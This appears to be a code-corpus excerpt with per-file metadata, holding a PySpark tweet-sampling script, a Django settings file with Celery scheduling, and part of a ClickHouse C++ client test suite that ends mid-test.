unique_share_ids = share_pool.select(share_pool['id'], share_pool['object.id'].alias('object_id')).rdd.filter(lambda row: row['object_id'] not in broadcast_post_ids.value).map(lambda row: row.id).collect()
expect('unique_share_pool', len(unique_share_ids), 193006)
log('# Completed finding unique share tweet')
# Constructing distinct tweet pool
broadcast_unique_share_ids = sc.broadcast(unique_share_ids)
distinct_tweets_pool = final_tweets_pool.\
    select(final_tweets_pool['id'], final_tweets_pool['body']).\
    rdd.\
    filter(lambda row: row['id'] in broadcast_post_ids.value or row['id'] in broadcast_unique_share_ids.value)
distinct_tweets_pool.persist(MEMORY_AND_DISK)
distinct_tweets_count = distinct_tweets_pool.count()
expect('distinct_tweets_pool', distinct_tweets_count, 1124935 + 193006)
# Exclude development tweets
tweets_unsampled = distinct_tweets_pool.toDF().where(~ col('id').isin(dev_posts))
tweets_unsampled.persist(MEMORY_AND_DISK)
tweets_unsampled_count = tweets_unsampled.count()
# no. of dev intersect post pool: 1718, no. of share dev intersect unique share pool: 293
expect('tweets_unsampled', tweets_unsampled_count, 1124935 + 193006 - 1718 - 293)
log('# Completed constructing unsampled tweets')
# Calculate subjectivity score per tweet body via a Spark UDF over the lexicon
lexicons = read_and_parse_clues()
udfBodyToRelevant = udf(lambda body: calculate_relevant(lexicons, body), IntegerType())
tweets_lexicon = tweets_unsampled.withColumn('score', udfBodyToRelevant('body'))
tweets_lexicon.persist(MEMORY_AND_DISK)
log('# Completed constructing tweet lexicon')
# Take top and bottom
number_of_tweets_each = 1500
positive_tweets = tweets_lexicon.orderBy(desc('score')).take(number_of_tweets_each)
negative_tweets = tweets_lexicon.orderBy(asc('score')).take(number_of_tweets_each)
# Cut top and bottom via score for more deterministic sampling
# (ties at the cut-off score are all kept, so counts exceed 1500)
min_positive_score = positive_tweets[-1]['score']
min_negative_score = negative_tweets[-1]['score']
expect('min_positive_score', min_positive_score, 7)
expect('min_negative_score', min_negative_score, -5)
positive_tweets = tweets_lexicon.filter('score > {}'.format(min_positive_score - 1)).orderBy(desc('score')).collect()
expect('positive_tweets', len(positive_tweets), 2012)
negative_tweets = tweets_lexicon.filter('score < {}'.format(min_negative_score + 1)).orderBy(asc('score')).collect()
expect('positive_tweets', len(negative_tweets), 1715)
positive_tweet_file = "positive_tweets"
positive_tweets_ids = map(lambda t: t['id'], positive_tweets)
positive_tweet_jsons = final_tweets_pool[final_tweets_pool['id'].isin(positive_tweets_ids)].toJSON().collect()
to_json(positive_tweet_file, positive_tweet_jsons)
to_csv(positive_tweet_file, positive_tweet_jsons)
log('Exporting positive tweets to {}'.format(positive_tweet_file))
log('# Completed exporting positive tweets')
expect('positive_tweet_file', sha(positive_tweet_file), 'cb2f8b691ccf3eae9846c67735f413a49befea28')
expect('positive_tweet_file', sha(positive_tweet_file, ext='csv'), 'd3d43ab4e03fdf106b9191f4e0161cfcde3f040e')
negative_tweet_file = "negative_tweets"
negative_tweet_ids = map(lambda t: t['id'], negative_tweets)
negative_tweet_jsons = final_tweets_pool[final_tweets_pool['id'].isin(negative_tweet_ids)].toJSON().collect()
to_json(negative_tweet_file, negative_tweet_jsons)
to_csv(negative_tweet_file, negative_tweet_jsons)
log('Exporting negative tweets to {}'.format(negative_tweet_file))
log('# Completed exporting negative tweets')
expect('negative_tweet_file', sha(negative_tweet_file), '086c43427078092e538a779b8b06a71341b8da48')
expect('negative_tweet_file', sha(negative_tweet_file, ext='csv'), 'd10a1a95156c28d844e9c4e668d766963c0636a4')
|
Python
|
Apache-2.0
|
chuajiesheng/twitter-sentiment-analysis/step_2/scripts/sample_subjectivity_tweets.py
|
e29700da-4299-4fad-80ee-8aef627bda02
|
[{"tag": "USERNAME", "value": "@ChipotleTweet", "start": 5225, "end": 5239, "context": "ecific_users)\n\n# Remove share retweet of tweet by @ChipotleTweet and news agencies\nall_shares_wo_specific_users = "}, {"tag": "USERNAME", "value": "@ChipotleTweet", "start": 3958, "end": 3972, "context": "idating tweets count')\n\n# Remove post authored by @ChipotleTweet and news agencies\nchipotle_tweet = 'id:twitter.co"}]
|
[{"tag": "USERNAME", "value": "@ChipotleTweet", "start": 5225, "end": 5239, "context": "ecific_users)\n\n# Remove share retweet of tweet by @ChipotleTweet and news agencies\nall_shares_wo_specific_users = "}, {"tag": "USERNAME", "value": "@ChipotleTweet", "start": 3958, "end": 3972, "context": "idating tweets count')\n\n# Remove post authored by @ChipotleTweet and news agencies\nchipotle_tweet = 'id:twitter.co"}]
|
"""
Django settings for hiren project.
Generated by 'django-admin startproject' using Django 1.8.4.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
import json
from celery.schedules import crontab
# Project root: two directory levels above this settings module.
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# load json file baby :D
# Prefer the real config; fall back to the checked-in sample so the app
# (and CI) can still boot without a local config.json.
try:
    with open('config.json') as f:
        JSON_DATA = json.load(f)
except FileNotFoundError:
    with open('config.sample.json') as f:
        JSON_DATA = json.load(f)
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# The environment variable wins; the JSON config is only a fallback.
SECRET_KEY = os.environ.get('SECRET_KEY', JSON_DATA['secret_key'])
# SECURITY WARNING: don't run with debug turned on in production!
# Bug fix: os.environ values are strings, so any non-empty value — even
# "False" or "0" — was truthy and silently enabled DEBUG. Parse explicitly;
# unset still defaults to False.
DEBUG = os.environ.get('DEBUG', 'False').strip().lower() in ('1', 'true', 'yes', 'on')
# NOTE(review): '*' accepts any Host header — fine behind a trusted proxy,
# but should be narrowed for direct production exposure.
ALLOWED_HOSTS = ['*']
# Application definition
INSTALLED_APPS = (
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'debug_toolbar',
    'github'
)
MIDDLEWARE_CLASSES = (
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
    'django.middleware.security.SecurityMiddleware',
)
ROOT_URLCONF = 'hiren.urls'
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': ['templates'],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]
WSGI_APPLICATION = 'hiren.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
# Travis CI provides a passwordless local postgres; otherwise use the
# local development database.
if 'TRAVIS' in os.environ:
    DATABASES = {
        'default': {
            'ENGINE': 'django.db.backends.postgresql_psycopg2',
            'NAME': 'travisci',
            'USER': 'postgres',
            'PASSWORD': '',
            'HOST': 'localhost',
            'PORT': '',
        }
    }
else:
    # NOTE(review): hard-coded dev credentials — acceptable locally, but
    # production should read these from the environment or config.json.
    DATABASES = {
        'default': {
            'ENGINE': 'django.db.backends.postgresql_psycopg2',
            'NAME': 'hiren_github_management',
            'USER': 'hiren',
            'PASSWORD': 'hiren',
            'HOST': 'localhost',
            'PORT': '',
        }
    }
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Asia/Dhaka'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_FINDERS = (
    "django.contrib.staticfiles.finders.FileSystemFinder",
    "django.contrib.staticfiles.finders.AppDirectoriesFinder"
)
STATICFILES_DIRS = (
    os.path.join(BASE_DIR, "static"),
)
LOGIN_URL = '/'
# CELERY STUFF — Redis as both broker and result backend, JSON-only payloads.
BROKER_URL = 'redis://localhost:6379'
CELERY_RESULT_BACKEND = 'redis://localhost:6379'
CELERY_ACCEPT_CONTENT = ['application/json']
CELERY_TASK_SERIALIZER = 'json'
CELERY_RESULT_SERIALIZER = 'json'
CELERYBEAT_SCHEDULE = {
    'add-every-30-seconds': {
        'task': 'github.tasks.get_data',
        'schedule': crontab(minute=0, hour='22'),  # execute every day at 10 pm
    },
}
|
Python
|
MIT
|
pyprism/Hiren-Git-Commit-Management/hiren/settings.py
|
d36c0e32-7146-4604-8400-4c8c0a85726f
|
[]
|
[]
|
#include <clickhouse/client.h>
#include "readonly_client_test.h"
#include "connection_failed_client_test.h"
#include "utils.h"
#include <gtest/gtest.h>
#include <cmath>
using namespace clickhouse;
namespace clickhouse {
/// Render a ServerInfo as "<name>/<display_name> ver X.Y.Z (revision)"
/// so gtest failure messages can print the server under test.
std::ostream & operator<<(std::ostream & ostr, const ServerInfo & server_info) {
    ostr << server_info.name << "/" << server_info.display_name << " ver "
         << server_info.version_major << "." << server_info.version_minor << "."
         << server_info.version_patch << " (" << server_info.revision << ")";
    return ostr;
}
}
namespace {

    /// Pack (major, minor, patch, revision) into one totally-ordered integer:
    ///   major * 10^16 + minor * 10^12 + patch * 10^8 + revision.
    /// Digit budget: revision gets 8 decimal places, patch and minor 4 each,
    /// which leaves room for version_major values up to ~1000.
    /// Fix: computed with exact integer constants instead of the original
    /// floating-point std::pow round-trip (double -> uint64_t casts).
    uint64_t versionNumber(
            uint64_t version_major,
            uint64_t version_minor,
            uint64_t version_patch = 0,
            uint64_t revision = 0) {

        constexpr uint64_t revision_base = 100000000ull;        // 10^8
        constexpr uint64_t patch_base    = revision_base * 10000; // 10^12
        constexpr uint64_t minor_base    = patch_base * 10000;    // 10^16

        return version_major * minor_base
             + version_minor * patch_base
             + version_patch * revision_base
             + revision;
    }

    /// Convenience overload: pack the version fields of a ServerInfo.
    uint64_t versionNumber(const ServerInfo & server_info) {
        return versionNumber(server_info.version_major, server_info.version_minor, server_info.version_patch, server_info.revision);
    }
}
// Use value-parameterized tests to run same tests with different client
// options.
// Shared fixture: each TEST_P gets a fresh Client built from the
// value-parameterized ClientOptions.
class ClientCase : public testing::TestWithParam<ClientOptions> {
protected:
    void SetUp() override {
        client_ = std::make_unique<Client>(GetParam());
        // client_->Execute("CREATE DATABASE IF NOT EXISTS test_clickhouse_cpp");
    }

    void TearDown() override {
        //if (client_)
        //    client_->Execute("DROP DATABASE test_clickhouse_cpp");
    }

    // (Re)create a one-column TEMPORARY table whose SQL column type is taken
    // from T's runtime type name, append an empty column of that type to
    // `block`, and return it for the caller to fill before Insert().
    template <typename T>
    std::shared_ptr<T> createTableWithOneColumn(Block & block)
    {
        auto col = std::make_shared<T>();
        const auto type_name = col->GetType().GetName();

        client_->Execute("DROP TEMPORARY TABLE IF EXISTS " + table_name + ";");
        client_->Execute("CREATE TEMPORARY TABLE IF NOT EXISTS " + table_name + "( " + column_name + " " + type_name + " )");

        block.AppendColumn("test_column", col);

        return col;
    }

    // SELECT of the single test column, for reading back inserted data.
    std::string getOneColumnSelectQuery() const
    {
        return "SELECT " + column_name + " FROM " + table_name;
    }

    std::unique_ptr<Client> client_;
    const std::string table_name = "test_clickhouse_cpp_test_ut_table";
    const std::string column_name = "test_column";
};
TEST_P(ClientCase, Array) {
    /// Round-trip an Array(UInt64) column. The inner column keeps growing
    /// between AppendAsColumn calls, so the four inserted rows are
    /// [1], [1,3], [1,3,7], [1,3,7,9].
    client_->Execute("CREATE TEMPORARY TABLE IF NOT EXISTS test_clickhouse_cpp_array (arr Array(UInt64)) ");

    {
        Block b;
        auto array_col = std::make_shared<ColumnArray>(std::make_shared<ColumnUInt64>());
        auto values = std::make_shared<ColumnUInt64>();
        for (uint64_t v : {1ull, 3ull, 7ull, 9ull}) {
            values->Append(v);
            array_col->AppendAsColumn(values);
        }
        b.AppendColumn("arr", array_col);
        client_->Insert("test_clickhouse_cpp_array", b);
    }

    const uint64_t expected_sizes[]  = { 1, 2, 3, 4 };
    const uint64_t expected_values[] = { 1, 3, 7, 9 };
    size_t row = 0;
    client_->Select("SELECT arr FROM test_clickhouse_cpp_array",
        [&](const Block& block)
        {
            if (block.GetRowCount() == 0)
                return;
            EXPECT_EQ(1U, block.GetColumnCount());
            for (size_t r = 0; r < block.GetRowCount(); ++r, ++row) {
                auto col = block[0]->As<ColumnArray>()->GetAsColumn(r);
                EXPECT_EQ(expected_sizes[row], col->Size());
                for (size_t i = 0; i < col->Size(); ++i) {
                    EXPECT_EQ(expected_values[i], (*col->As<ColumnUInt64>())[i]);
                }
            }
        }
    );
    EXPECT_EQ(4U, row);
}
TEST_P(ClientCase, Date) {
    /// A DateTime('UTC') value must come back unchanged, with its timezone intact.
    client_->Execute(
        "CREATE TEMPORARY TABLE IF NOT EXISTS test_clickhouse_cpp_date (d DateTime('UTC')) ");

    Block b;
    auto d = std::make_shared<ColumnDateTime>();
    const std::time_t now = std::time(nullptr);
    d->Append(now);
    b.AppendColumn("d", d);
    client_->Insert("test_clickhouse_cpp_date", b);

    client_->Select("SELECT d FROM test_clickhouse_cpp_date", [&now](const Block& block)
        {
            if (block.GetRowCount() == 0)
                return;
            EXPECT_EQ(1U, block.GetRowCount());
            EXPECT_EQ(1U, block.GetColumnCount());
            for (size_t r = 0; r < block.GetRowCount(); ++r) {
                auto col = block[0]->As<ColumnDateTime>();
                EXPECT_EQ(now, col->At(r));
                EXPECT_EQ(col->Timezone(), "UTC");
            }
        }
    );
}
TEST_P(ClientCase, LowCardinality) {
    /// LowCardinality(String) values must round-trip in insertion order.
    Block block;
    auto lc = createTableWithOneColumn<ColumnLowCardinalityT<ColumnString>>(block);

    const std::vector<std::string> data{{"FooBar", "1", "2", "Foo", "4", "Bar", "Foo", "7", "8", "Foo"}};
    lc->AppendMany(data);
    block.RefreshRowCount();
    client_->Insert(table_name, block);

    size_t total_rows = 0;
    client_->Select(getOneColumnSelectQuery(),
        [&](const Block& b) {
            total_rows += b.GetRowCount();
            if (b.GetRowCount() == 0)
                return;
            ASSERT_EQ(1U, b.GetColumnCount());
            if (auto col = b[0]->As<ColumnLowCardinalityT<ColumnString>>()) {
                ASSERT_EQ(data.size(), col->Size());
                for (size_t i = 0; i < col->Size(); ++i)
                    EXPECT_EQ(data[i], (*col)[i]) << " at index: " << i;
            }
        }
    );
    ASSERT_EQ(total_rows, data.size());
}
TEST_P(ClientCase, LowCardinality_InsertAfterClear) {
    /// Clear() must leave the LC column in a state where fresh values insert cleanly.
    Block block;
    auto lc = createTableWithOneColumn<ColumnLowCardinalityT<ColumnString>>(block);

    // Seed with throwaway values so Clear() has a non-empty dictionary to discard.
    lc->AppendMany(std::vector<std::string_view>{"abc", "def", "123", "abc", "123", "def", "ghi"});
    EXPECT_GT(lc->Size(), 0u);
    EXPECT_GT(lc->GetDictionarySize(), 0u);
    lc->Clear();

    // Only data appended after Clear() should reach the server.
    const std::vector<std::string> data{{"FooBar", "1", "2", "Foo", "4", "Bar", "Foo", "7", "8", "Foo"}};
    lc->AppendMany(data);
    block.RefreshRowCount();
    client_->Insert(table_name, block);

    size_t total_rows = 0;
    client_->Select(getOneColumnSelectQuery(),
        [&](const Block& b) {
            total_rows += b.GetRowCount();
            if (b.GetRowCount() == 0)
                return;
            ASSERT_EQ(1U, b.GetColumnCount());
            if (auto col = b[0]->As<ColumnLowCardinalityT<ColumnString>>()) {
                ASSERT_EQ(data.size(), col->Size());
                for (size_t i = 0; i < col->Size(); ++i)
                    EXPECT_EQ(data[i], (*col)[i]) << " at index: " << i;
            }
        }
    );
    ASSERT_EQ(total_rows, data.size());
}
// Validate that LowCardinality(String) column values can be INSERTed from client as ColumnString
// and also read on client (enabled by special option) as ColumnString.
TEST_P(ClientCase, LowCardinalityString_AsString) {
    ClientOptions options = GetParam();
    options.SetBakcwardCompatibilityFeatureLowCardinalityAsWrappedColumn(true);
    // BUGFIX: build the client from `options` (which carries the
    // compatibility flag), not from a fresh GetParam() — otherwise the
    // feature under test is never actually enabled.
    client_ = std::make_unique<Client>(options);
    // client_->Execute("CREATE DATABASE IF NOT EXISTS test_clickhouse_cpp");

    Block block;
    auto col = std::make_shared<ColumnString>();

    client_->Execute("DROP TEMPORARY TABLE IF EXISTS " + table_name + ";");
    client_->Execute("CREATE TEMPORARY TABLE IF NOT EXISTS " + table_name + "( " + column_name + " LowCardinality(String) )");
    block.AppendColumn("test_column", col);

    const std::vector<std::string> data{{"FooBar", "1", "2", "Foo", "4", "Bar", "Foo", "7", "8", "Foo"}};
    for (const auto & v : data)
        col->Append(v);

    block.RefreshRowCount();
    client_->Insert(table_name, block);

    // Now the data can be accessed via ColumnString instead of
    // ColumnLowCardinalityT<ColumnString>.
    size_t total_rows = 0;
    client_->Select(getOneColumnSelectQuery(),
        [&total_rows, &data](const Block& block) {
            total_rows += block.GetRowCount();
            if (block.GetRowCount() == 0) {
                return;
            }
            ASSERT_EQ(1U, block.GetColumnCount());
            if (auto col = block[0]->As<ColumnString>()) {
                ASSERT_EQ(data.size(), col->Size());
                for (size_t i = 0; i < col->Size(); ++i) {
                    EXPECT_EQ(data[i], (*col)[i]) << " at index: " << i;
                }
            }
        }
    );
    ASSERT_EQ(total_rows, data.size());
}
// Basic typed round-trip: inserts (UInt64, String) rows and verifies values
// and column names come back in insertion order.
TEST_P(ClientCase, Generic) {
    client_->Execute(
        "CREATE TEMPORARY TABLE IF NOT EXISTS test_clickhouse_cpp_client (id UInt64, name String) ");

    const struct {
        uint64_t id;
        std::string name;
    } TEST_DATA[] = {
        { 1, "id" },
        { 3, "foo" },
        { 5, "bar" },
        { 7, "name" },
    };

    /// Insert some values.
    {
        Block block;
        auto id = std::make_shared<ColumnUInt64>();
        auto name = std::make_shared<ColumnString>();
        for (auto const& td : TEST_DATA) {
            id->Append(td.id);
            name->Append(td.name);
        }

        block.AppendColumn("id" , id);
        block.AppendColumn("name", name);
        client_->Insert("test_clickhouse_cpp_client", block);
    }

    /// Select values inserted in the previous step.
    // `row` is a cursor into TEST_DATA that advances across callback blocks.
    size_t row = 0;
    client_->Select("SELECT id, name FROM test_clickhouse_cpp_client", [TEST_DATA, &row](const Block& block)
        {
            if (block.GetRowCount() == 0) {
                return;
            }
            EXPECT_EQ("id", block.GetColumnName(0));
            EXPECT_EQ("name", block.GetColumnName(1));
            for (size_t c = 0; c < block.GetRowCount(); ++c, ++row) {
                EXPECT_EQ(TEST_DATA[row].id, (*block[0]->As<ColumnUInt64>())[c]);
                EXPECT_EQ(TEST_DATA[row].name, (*block[1]->As<ColumnString>())[c]);
            }
        }
    );
    // Every fixture row must have been observed exactly once.
    EXPECT_EQ(sizeof(TEST_DATA)/sizeof(TEST_DATA[0]), row);
}
// Round-trips Nullable(UInt64) and Nullable(Date) columns: each value travels
// with a parallel null mask, and nested values are only checked where the
// mask says "not null".
TEST_P(ClientCase, Nullable) {
    /// Create a table.
    client_->Execute(
        "CREATE TEMPORARY TABLE IF NOT EXISTS test_clickhouse_cpp_nullable (id Nullable(UInt64), date Nullable(Date)) ");

    // Round std::time_t to start of date.
    const std::time_t cur_date = std::time(nullptr) / 86400 * 86400;
    const struct {
        uint64_t id;
        uint8_t id_null;    // 1 => id is NULL
        std::time_t date;
        uint8_t date_null;  // 1 => date is NULL
    } TEST_DATA[] = {
        { 1, 0, cur_date - 2 * 86400, 0 },
        { 2, 0, cur_date - 1 * 86400, 1 },
        { 3, 1, cur_date + 1 * 86400, 0 },
        { 4, 1, cur_date + 2 * 86400, 1 },
    };

    /// Insert some values.
    {
        Block block;
        {
            auto id = std::make_shared<ColumnUInt64>();
            auto nulls = std::make_shared<ColumnUInt8>();
            for (auto const& td : TEST_DATA) {
                id->Append(td.id);
                nulls->Append(td.id_null);
            }

            // ColumnNullable pairs the value column with its null mask.
            block.AppendColumn("id", std::make_shared<ColumnNullable>(id, nulls));
        }
        {
            auto date = std::make_shared<ColumnDate>();
            auto nulls = std::make_shared<ColumnUInt8>();
            for (auto const& td : TEST_DATA) {
                date->Append(td.date);
                nulls->Append(td.date_null);
            }

            block.AppendColumn("date", std::make_shared<ColumnNullable>(date, nulls));
        }

        client_->Insert("test_clickhouse_cpp_nullable", block);
    }

    /// Select values inserted in the previous step.
    size_t row = 0;
    client_->Select("SELECT id, date FROM test_clickhouse_cpp_nullable",
            [TEST_DATA, &row](const Block& block)
        {
            for (size_t c = 0; c < block.GetRowCount(); ++c, ++row) {
                auto col_id   = block[0]->As<ColumnNullable>();
                auto col_date = block[1]->As<ColumnNullable>();

                EXPECT_EQ(static_cast<bool>(TEST_DATA[row].id_null),
                        col_id->IsNull(c));
                if (!col_id->IsNull(c)) {
                    EXPECT_EQ(TEST_DATA[row].id,
                            col_id->Nested()->As<ColumnUInt64>()->At(c));
                }

                EXPECT_EQ(static_cast<bool>(TEST_DATA[row].date_null),
                        col_date->IsNull(c));
                if (!col_date->IsNull(c)) {
                    // Because date column type is Date instead of
                    // DateTime, round to start second of date for test.
                    EXPECT_EQ(TEST_DATA[row].date,
                            col_date->Nested()->As<ColumnDate>()->At(c));
                }
            }
        }
    );

    EXPECT_EQ(sizeof(TEST_DATA) / sizeof(TEST_DATA[0]), row);
}
// Streams 100000 consecutive integers from system.numbers and checks they
// arrive in order, across however many blocks the server splits them into.
TEST_P(ClientCase, Numbers) {
    size_t expected = 0;
    client_->Select("SELECT number, number FROM system.numbers LIMIT 100000",
        [&expected](const Block& block) {
            if (block.GetRowCount() == 0)
                return;
            const auto numbers = block[0]->As<ColumnUInt64>();
            const size_t count = numbers->Size();
            for (size_t row = 0; row != count; ++row) {
                EXPECT_EQ(expected, numbers->At(row));
                ++expected;
            }
        });
    // Exactly LIMIT rows must have been observed.
    EXPECT_EQ(100000U, expected);
}
// SimpleAggregateFunction(sum, UInt64) columns should read back as their
// underlying UInt64 type. Skipped on servers older than 19.9, which predate
// the type.
TEST_P(ClientCase, SimpleAggregateFunction) {
    const auto & server_info = client_->GetServerInfo();
    if (versionNumber(server_info) < versionNumber(19, 9)) {
        std::cout << "Test is skipped since server '" << server_info << "' does not support SimpleAggregateFunction" << std::endl;
        return;
    }

    client_->Execute("DROP TEMPORARY TABLE IF EXISTS test_clickhouse_cpp_SimpleAggregateFunction");
    client_->Execute(
        "CREATE TEMPORARY TABLE IF NOT EXISTS test_clickhouse_cpp_SimpleAggregateFunction (saf SimpleAggregateFunction(sum, UInt64))");

    constexpr size_t EXPECTED_ROWS = 10;
    // NOTE: the LIMIT literal below must stay in sync with EXPECTED_ROWS.
    client_->Execute("INSERT INTO test_clickhouse_cpp_SimpleAggregateFunction (saf) SELECT number FROM system.numbers LIMIT 10");

    size_t total_rows = 0;
    client_->Select("Select * FROM test_clickhouse_cpp_SimpleAggregateFunction", [&total_rows](const Block & block) {
        if (block.GetRowCount() == 0)
            return;
        total_rows += block.GetRowCount();

        // The SAF column is surfaced to the client as plain UInt64.
        auto col = block[0]->As<ColumnUInt64>();
        ASSERT_NE(nullptr, col);
        for (size_t r = 0; r < col->Size(); ++r) {
            EXPECT_EQ(r, col->At(r));
        }

        EXPECT_EQ(total_rows, col->Size());
    });

    EXPECT_EQ(EXPECTED_ROWS, total_rows);
}
// Verifies SelectCancelable(): a callback returning false cancels the query,
// so fewer rows than inserted may be delivered, and no exception escapes.
TEST_P(ClientCase, Cancellable) {
    /// Create a table.
    client_->Execute(
        "CREATE TEMPORARY TABLE IF NOT EXISTS test_clickhouse_cpp_cancel (x UInt64) ");

    /// Insert a few blocks. In order to make cancel have effect, we have to
    /// insert a relatively large amount of data.
    // Use unsigned types throughout so the loop conditions below don't mix
    // signed and unsigned operands (the original `int` constants did).
    const size_t kBlock = 10;
    const uint64_t kRowEachBlock = 1000000;
    for (size_t j = 0; j < kBlock; j++) {
        Block b;

        auto x = std::make_shared<ColumnUInt64>();
        for (uint64_t i = 0; i < kRowEachBlock; i++) {
            x->Append(i);
        }

        b.AppendColumn("x", x);
        client_->Insert("test_clickhouse_cpp_cancel", b);
    }
    /// Send a query which is canceled after receiving the first block.
    // size_t matches Block::GetRowCount() and avoids narrowing on +=.
    size_t row_cnt = 0;
    EXPECT_NO_THROW(
        client_->SelectCancelable("SELECT * FROM test_clickhouse_cpp_cancel",
            [&row_cnt](const Block& block)
            {
                row_cnt += block.GetRowCount();
                return false; // request cancellation after the first block
            }
        );
    );
    /// It's easier to get query cancelled for compress enabled client.
    EXPECT_LE(row_cnt, kBlock * kRowEachBlock);
}
// The server must reject re-creating an existing table when IF NOT EXISTS is
// omitted, and the client must surface that as a ServerException.
TEST_P(ClientCase, Exception) {
    // First creation is idempotent thanks to IF NOT EXISTS.
    client_->Execute(
        "CREATE TEMPORARY TABLE IF NOT EXISTS test_clickhouse_cpp_exceptions (id UInt64, name String) ");

    // Second creation of the same table, without the guard, must throw.
    EXPECT_THROW(
        client_->Execute(
            "CREATE TEMPORARY TABLE test_clickhouse_cpp_exceptions (id UInt64, name String) "),
        ServerException);
}
// Round-trips Enum8 values: appends alternately by numeric value and by
// name, then verifies both At() (numeric) and NameAt() (string) on SELECT.
TEST_P(ClientCase, Enum) {
    /// Create a table.
    client_->Execute(
        "CREATE TEMPORARY TABLE IF NOT EXISTS test_clickhouse_cpp_enums (id UInt64, e Enum8('One' = 1, 'Two' = 2)) ");

    const struct {
        uint64_t id;
        int8_t eval;        // numeric enum value
        std::string ename;  // matching enum name
    } TEST_DATA[] = {
        { 1, 1, "One" },
        { 2, 2, "Two" },
        { 3, 2, "Two" },
        { 4, 1, "One", },
    };

    /// Insert some values.
    {
        Block block;
        auto id = std::make_shared<ColumnUInt64>();
        auto e = std::make_shared<ColumnEnum8>(Type::CreateEnum8({{"One", 1}, {"Two", 2}}));

        int i = 0;
        for (auto const& td : TEST_DATA) {
            id->Append(td.id);
            // Alternate between appending by value and by name to cover
            // both Append overloads.
            if (++i % 2) {
                e->Append(td.eval);
            } else {
                e->Append(td.ename);
            }
        }

        block.AppendColumn("id", id);
        block.AppendColumn("e", e);
        client_->Insert("test_clickhouse_cpp_enums", block);
    }

    /// Select values inserted in the previous step.
    size_t row = 0;
    client_->Select("SELECT id, e FROM test_clickhouse_cpp_enums", [&row, TEST_DATA](const Block& block)
        {
            if (block.GetRowCount() == 0) {
                return;
            }
            EXPECT_EQ("id", block.GetColumnName(0));
            EXPECT_EQ("e", block.GetColumnName(1));
            for (size_t i = 0; i < block.GetRowCount(); ++i, ++row) {
                EXPECT_EQ(TEST_DATA[row].id, (*block[0]->As<ColumnUInt64>())[i]);
                EXPECT_EQ(TEST_DATA[row].eval, (*block[1]->As<ColumnEnum8>()).At(i));
                EXPECT_EQ(TEST_DATA[row].ename, (*block[1]->As<ColumnEnum8>()).NameAt(i));
            }
        }
    );
    EXPECT_EQ(sizeof(TEST_DATA)/sizeof(TEST_DATA[0]), row);
}
// Exhaustive Decimal round-trip: covers all three storage widths
// (Decimal32/64/128 and their Decimal(P,S) spellings), appending from raw
// integers and from strings (with/without decimal point and sign), plus
// rejection of malformed/overflowing string inputs.
TEST_P(ClientCase, Decimal) {
    client_->Execute(
        "CREATE TEMPORARY TABLE IF NOT EXISTS "
        "test_clickhouse_cpp_decimal (id UInt64, d1 Decimal(9, 4), d2 Decimal(18, 9), d3 Decimal(38, 19), "
        " d4 Decimal32(4), d5 Decimal64(9), d6 Decimal128(19)) ");

    {
        Block b;

        auto id = std::make_shared<ColumnUInt64>();
        auto d1 = std::make_shared<ColumnDecimal>(9, 4);
        auto d2 = std::make_shared<ColumnDecimal>(18, 9);
        auto d3 = std::make_shared<ColumnDecimal>(38, 19);
        auto d4 = std::make_shared<ColumnDecimal>(9, 4);
        auto d5 = std::make_shared<ColumnDecimal>(18, 9);
        auto d6 = std::make_shared<ColumnDecimal>(38, 19);

        // Invalid inputs: values exceeding precision 9, and strings with
        // misplaced signs, stray letters, or multiple decimal points must
        // all be rejected with std::runtime_error.
        EXPECT_THROW(
            d1->Append("1234567890123456789012345678901234567890"),
            std::runtime_error
        );
        EXPECT_THROW(
            d1->Append("123456789012345678901234567890123456.7890"),
            std::runtime_error
        );
        EXPECT_THROW(
            d1->Append("-1234567890123456789012345678901234567890"),
            std::runtime_error
        );
        EXPECT_THROW(
            d1->Append("12345678901234567890123456789012345678a"),
            std::runtime_error
        );
        EXPECT_THROW(
            d1->Append("12345678901234567890123456789012345678-"),
            std::runtime_error
        );
        EXPECT_THROW(
            d1->Append("1234.12.1234"),
            std::runtime_error
        );

        // Row 1: plain positive integers (raw scaled representation).
        id->Append(1);
        d1->Append(123456789);
        d2->Append(123456789012345678);
        d3->Append(1234567890123456789);
        d4->Append(123456789);
        d5->Append(123456789012345678);
        d6->Append(1234567890123456789);

        // Row 2: maximum positive values for each precision.
        id->Append(2);
        d1->Append(999999999);
        d2->Append(999999999999999999);
        d3->Append(999999999999999999);
        d4->Append(999999999);
        d5->Append(999999999999999999);
        d6->Append(999999999999999999);

        // Row 3: the negative counterparts.
        id->Append(3);
        d1->Append(-999999999);
        d2->Append(-999999999999999999);
        d3->Append(-999999999999999999);
        d4->Append(-999999999);
        d5->Append(-999999999999999999);
        d6->Append(-999999999999999999);

        // Check strings with decimal point
        id->Append(4);
        d1->Append("12345.6789");
        d2->Append("123456789.012345678");
        d3->Append("1234567890123456789.0123456789012345678");
        d4->Append("12345.6789");
        d5->Append("123456789.012345678");
        d6->Append("1234567890123456789.0123456789012345678");

        // Check strings with minus sign and without decimal point
        id->Append(5);
